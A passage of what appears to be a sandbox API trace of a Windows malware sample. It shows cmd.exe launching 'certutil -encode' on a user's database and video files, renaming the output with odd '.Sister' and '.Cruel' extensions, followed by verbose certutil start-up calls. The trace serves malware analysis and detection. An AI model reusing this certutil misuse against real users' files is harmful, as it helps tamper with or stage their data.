out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0308.680] GetLastError () returned 0x2 [0308.680] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cee0 [0308.680] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0308.680] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0308.680] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0308.680] ??_V@YAXPEAX@Z () returned 0x1 [0308.680] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0308.682] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0308.682] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0308.682] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0308.682] GetProcessHeap () returned 0x21ed8c70000 [0308.682] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45c80 [0308.682] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0308.682] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0308.682] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0308.682] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0308.682] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0308.683] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0308.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0308.684] GetProcessHeap () returned 0x21ed8c70000 [0308.684] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45c80) returned 1 [0308.684] GetProcessHeap () returned 0x21ed8c70000 [0308.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95900 [0308.684] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0308.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.684] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0308.685] _get_osfhandle (_FileHandle=0) returned 0x4c [0308.685] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0308.685] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"Database1.accdb.Sister\" \"Database1.accdb.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Documents", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Database1.accdb.Sister\" \"Database1.accdb.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"Database1.accdb.Sister\" \"Database1.accdb.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xea0, dwThreadId=0xe90)) returned 1 [0308.702] CloseHandle (hObject=0xa4) returned 1 [0308.702] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0308.702] GetProcessHeap () returned 0x21ed8c70000 [0308.702] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0308.702] GetEnvironmentStringsW () returned 0x21ed9980080* [0308.702] GetProcessHeap () returned 0x21ed8c70000 [0308.702] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d603e0 [0308.702] FreeEnvironmentStringsA (penv="=") returned 1 [0308.702] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) Thread: id = 26 os_tid = 0x760 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x46f06000" os_pid = "0x11a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x11b8 Thread: id = 22 os_tid = 0x11b4 Thread: id = 23 os_tid = 0x11a8 Thread: id = 24 os_tid = 0x1214 Thread: id = 25 os_tid = 0x121c Process: id = "5" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x17502000" os_pid = "0x1160" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x1064 [0206.140] GetStartupInfoW (in: lpStartupInfo=0x3fd5adf870 | out: lpStartupInfo=0x3fd5adf870*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0206.142] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0206.142] __set_app_type (_Type=0x1) [0206.143] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0206.143] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0206.148] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0206.149] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0206.153] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0206.155] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0206.155] WerSetFlags () returned 0x0 [0206.155] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.155] __iob_func () returned 0x7ffcea2dea00 [0206.155] _fileno (_File=0x7ffcea2dea30) returned 1 [0206.155] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0206.155] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0206.157] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0206.157] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0206.157] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0206.158] GetConsoleOutputCP () returned 0x1b5 [0206.172] _vsnwprintf (in: _Buffer=0x3fd5adf7e0, _BufferCount=0xb, _Format=".%d", _ArgList=0x3fd5adf708 | out: _Buffer=".437") returned 4 [0206.172] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0206.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.172] GetFileType (hFile=0x50) returned 0x2 [0206.172] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0206.172] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0206.172] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.178] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0206.188] GetCommandLineW () returned="certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"" [0206.188] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x20b4d14db20 [0206.189] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x20b4d13cdd0 [0206.189] LocalFree (hMem=0x20b4d14db20) returned 0x0 [0206.189] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x20b4d13d010 [0206.189] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x20b4d155580 [0206.189] LocalFree (hMem=0x20b4d13d010) returned 0x0 [0206.189] LocalFree (hMem=0x20b4d13cdd0) returned 0x0 [0206.189] LocalFree (hMem=0x0) returned 0x0 [0206.190] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0206.190] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0206.191] GetCommandLineW () returned="certutil -encode \"0kL8UpxhMP3oFa.avi.Sister\" \"0kL8UpxhMP3oFa.avi.Cruel\"" [0206.191] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x20b4d14dde0 [0206.191] GetSystemTime (in: lpSystemTime=0x3fd5adf4d0 | out: lpSystemTime=0x3fd5adf4d0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x28, wMilliseconds=0x2db)) [0206.191] SystemTimeToFileTime (in: lpSystemTime=0x3fd5adf4d0, lpFileTime=0x3fd5adf4c8 | out: lpFileTime=0x3fd5adf4c8) returned 1 [0206.191] FileTimeToLocalFileTime (in: lpFileTime=0x3fd5adf4c8, lpLocalFileTime=0x3fd5adf490 | out: lpLocalFileTime=0x3fd5adf490) returned 1 [0206.191] FileTimeToSystemTime (in: lpFileTime=0x3fd5adf490, lpSystemTime=0x3fd5adf200 | out: lpSystemTime=0x3fd5adf200) returned 1 [0206.191] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x3fd5adf200, lpFormat=0x0, lpDateStr=0x3fd5adf310, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0206.191] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x3fd5adf200, lpFormat=0x0, lpTimeStr=0x3fd5adf210, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0206.191] _vsnwprintf (in: _Buffer=0x3fd5adf21e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x3fd5adf1e8 | out: _Buffer=" 40.731s") returned 8 [0206.191] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x20b4d150a60 [0206.191] SetLastError (dwErrCode=0x80070716) [0206.192] _vsnwprintf (in: _Buffer=0x3fd5adf298, _BufferCount=0xb, _Format="%d", _ArgList=0x3fd5adf288 | out: _Buffer="948") returned 3 [0206.192] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x3fd5adf050, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0206.193] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x20b4d14df80 [0206.193] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x20b4d13c210 [0206.193] LocalFree (hMem=0x20b4d150a60) returned 0x0 [0206.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3fd5adf540 | out: lpSystemTimeAsFileTime=0x3fd5adf540*(dwLowDateTime=0xa5825bae, dwHighDateTime=0x1d6141f)) [0206.193] GetLocalTime (in: lpSystemTime=0x3fd5adf578 | out: lpSystemTime=0x3fd5adf578*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x28, wMilliseconds=0x2dd)) [0206.193] SystemTimeToFileTime (in: lpSystemTime=0x3fd5adf578, lpFileTime=0x3fd5adf550 | out: lpFileTime=0x3fd5adf550) returned 1 [0206.193] CompareFileTime (lpFileTime1=0x3fd5adf550, lpFileTime2=0x3fd5adf540) returned 1 [0206.194] _vsnwprintf (in: _Buffer=0x3fd5adf588, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x3fd5adf518 | out: _Buffer="GMT + 2.00") returned 10 [0206.195] LocalFree (hMem=0x20b4d14dde0) returned 0x0 [0206.195] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc8bf0000 [0206.195] FindResourceW (hModule=0x7ffcc8bf0000, lpName=0x1, lpType=0x10) returned 0x7ffcc8cb0090 [0206.195] LoadResource (hModule=0x7ffcc8bf0000, hResInfo=0x7ffcc8cb0090) returned 0x7ffcc8cb00b0 [0206.195] LockResource (hResData=0x7ffcc8cb00b0) returned 0x7ffcc8cb00b0 [0206.195] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0206.196] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x3fd5adf5b8 | out: _Buffer="10.0.15063.447") returned 14 [0206.196] GetACP () returned 0x4e4 [0206.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0206.196] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20b4d14dc40 [0206.196] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x20b4d14dc40, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0206.196] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x20b4d150a20 [0206.196] _vsnwprintf (in: _Buffer=0x20b4d150a20, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3fd5adf608 | out: _Buffer="10.0.15063.447 retail") returned 21 [0206.197] LocalFree (hMem=0x20b4d14dc40) returned 0x0 [0206.197] LocalFree (hMem=0x0) returned 0x0 [0206.197] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0206.197] GetACP () returned 0x4e4 [0206.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0206.197] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20b4d14dc60 [0206.197] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x20b4d14dc60, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0206.197] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x20b4d1503e0 [0206.198] _vsnwprintf (in: _Buffer=0x20b4d1503e0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3fd5adf608 | out: _Buffer="10.0.15063.447 retail") returned 21 [0206.198] LocalFree (hMem=0x20b4d14dc60) returned 0x0 [0206.198] LocalFree (hMem=0x0) returned 0x0 [0206.198] GetACP () returned 0x4e4 [0206.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0206.198] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20b4d14da80 [0206.198] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x20b4d14da80, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0206.198] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x20b4d1506a0 [0206.198] _vsnwprintf (in: _Buffer=0x20b4d1506a0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3fd5adf638 | out: _Buffer="10.0.15063.447 retail") returned 21 [0206.198] LocalFree (hMem=0x20b4d14da80) returned 0x0 [0206.198] LocalFree (hMem=0x20b4d150a20) returned 0x0 [0206.198] LocalFree (hMem=0x20b4d1503e0) returned 0x0 [0206.198] LocalFree (hMem=0x20b4d1506a0) returned 0x0 [0206.199] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0206.199] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0206.199] GetStockObject (i=0) returned 0x900010 [0206.199] RegisterClassW (lpWndClass=0x3fd5adf760) returned 0xc1a2 [0206.200] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x50044 [0206.223] NtdllDefWindowProc_W () returned 0x0 [0206.223] NtdllDefWindowProc_W () returned 0x1 [0206.236] NtdllDefWindowProc_W () returned 0x0 [0206.249] UpdateWindow (hWnd=0x50044) returned 1 [0206.249] PostMessageW (hWnd=0x50044, Msg=0x400, wParam=0x0, lParam=0x20b4d13215e) returned 1 [0206.249] GetMessageW (in: lpMsg=0x3fd5adf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3fd5adf7b0) returned 1 [0206.249] TranslateMessage (lpMsg=0x3fd5adf7b0) returned 0 [0206.249] DispatchMessageW (lpMsg=0x3fd5adf7b0) returned 0x0 [0206.249] NtdllDefWindowProc_W () returned 0x0 [0206.249] GetMessageW (in: lpMsg=0x3fd5adf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3fd5adf7b0) returned 1 [0206.249] TranslateMessage (lpMsg=0x3fd5adf7b0) returned 0 [0206.249] DispatchMessageW (lpMsg=0x3fd5adf7b0) returned 0x0 [0206.249] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x20b4d13bf50 [0206.250] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x20b4d134400 [0206.250] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0206.250] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0206.250] SetLastError (dwErrCode=0x80070716) [0206.250] _vsnwprintf (in: _Buffer=0x3fd5adf1b8, _BufferCount=0xb, _Format="%d", _ArgList=0x3fd5adf1a8 | out: _Buffer="465") returned 3 [0206.250] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x3fd5adef70, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0206.250] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x20b4d1555e0 [0206.250] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0206.251] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0206.251] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x3fd5adef50, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0206.251] GetLastError () returned 0xcb [0206.251] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0206.252] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0206.252] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0206.252] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0206.252] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0206.252] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0206.252] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0206.252] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0206.252] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0206.252] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0206.252] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0206.252] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0206.252] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0206.252] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0206.252] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0206.252] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0206.253] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0206.253] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0206.253] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0206.253] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0206.253] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0206.253] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x3fd5adec18 | out: phkResult=0x3fd5adec18*=0x23c) returned 0x0 [0206.253] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x20b4d13c860 [0206.253] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x3fd5adf188, lpData=0x3fd5adf1b8, lpcbData=0x3fd5adf180*=0x4 | out: lpType=0x3fd5adf188*=0x0, lpData=0x3fd5adf1b8*=0x0, lpcbData=0x3fd5adf180*=0x4) returned 0x2 [0206.253] LocalFree (hMem=0x20b4d13c860) returned 0x0 [0206.253] RegCloseKey (hKey=0x23c) returned 0x0 [0206.254] LocalFree (hMem=0x0) returned 0x0 [0206.255] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x0 [0206.276] CryptRegisterOIDInfo (pInfo=0x3fd5adf130, dwFlags=0x0) returned 1 [0206.278] CryptRegisterOIDInfo (pInfo=0x3fd5adf130, dwFlags=0x0) returned 1 [0206.278] CryptRegisterOIDInfo (pInfo=0x3fd5adf130, dwFlags=0x0) returned 1 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0206.278] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0206.278] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0206.278] CompareStringW 